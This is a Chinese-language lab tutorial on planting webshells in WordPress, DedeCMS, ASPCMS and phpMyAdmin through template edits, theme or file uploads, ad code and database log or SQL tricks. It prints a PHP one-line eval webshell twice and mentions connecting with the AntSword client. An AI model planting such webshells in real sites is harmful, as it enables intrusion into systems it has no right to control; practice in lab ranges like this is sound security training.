常见CMS获取webshell的方法-靶场练习

一.wordpress拿去webshell的两种方法

1.后台修改模板获取websehll

1.1首先我们来到我们的vulhub靶场，然后启动我们的环境。命令：

cd /vulhub-master/wordpress/ pwnscriptum/

docker-compose up -d

2.然后输入：docker ps查看端口然后去访问

3.然后我们访问一下，来到首页后会叫我们创建用户，创建完成并登录

4.登录成功后如图片中的去操作

5.然后我们去访问这个404.php文件，文件位置为：/wp-content/themes/自己模板的名称/404.php

6.尝试执行命令，成功执行命令！

2.上传主题获取webshell

1.我们先下载一个模板文件，直接去百度搜索wordpress免费模板下载即可。

2.然后我们解压压缩包，并在文件里面写入一个1.php的木马文件，木马内容为：<?php
eval($_POST[cmd]);
?>

3.写好后再将文件压缩，然后上传

4.上传成功后会给你一个地址，我们去访问一下这个文件夹下的木马文件，并尝试执行命令可以看到成功执行。

二.DEDECMS获取webshell

1.通过文件上传器获取webshell

1.首先暗安装靶场：织梦 (DedeCMS) 官方网站 - 内容管理系统 - 上海卓卓网络科技有限公司

2.然后下载后解压在我们小皮面板的网站根目录下

3.然后去访问这个网站，然后填写数据库信息注册。

4.安装好后登录后台

5.然后来到文件上传的地方。

6.准备一个1.php木马文件文件内容：<?php @eval($_POST[cmd]);?>，然后上传文件。上传文件成功后可以看到文件地址，我们去访问一下。

7.成功访问到后尝试执行命令可以看到成功执行。

2.修改文件模板获取webshell

1.然后来到模板这里修改文件

2.然后我们点击修改，修改文件然后保存并更行

然后来到这里修改

3.修改完刷新后就可以看到命令执行了。

3.后台执行任意命令

1.首先我们来到广告界面，按照图片中操作

2.然后再按照托i暗中修改广告代码

3.然后我们来到这里查看路径

4.访问成功后我们使用蚁剑连接，成功连接

 三.ASPCMS获取websehll

1.首先我们安装好我们的靶场

2.然后我们如图所示可以看到这里可以修改幻灯片的配置。那我们就可以直接修改幻灯片的配置。

3.然后我们来到这个文件夹来修改文件

然后按照图片中的位置修改

4.然后我们去访问这个文件，成功访问到

5.然后我们取用木马连接工具连接木马

四.PhPMyadmin获取webshell

1.使用日志文件拿去shell

1.首先我们先安装PhPMyadmin

2.然后来到管理的网站，然后使用密码登录

3.接下来按照图片修改

5.在这里查询一句话木马，这样日志文件里面就会有这个一句话木马了。

6.去浏览器访问这个文件，然后去执行命令可以看到成功执行。

2.sql语句插入木马

1.我们输入sql插入语句

2.然后我们尝试去访问这个文件，并执行命令可以看到成功执行。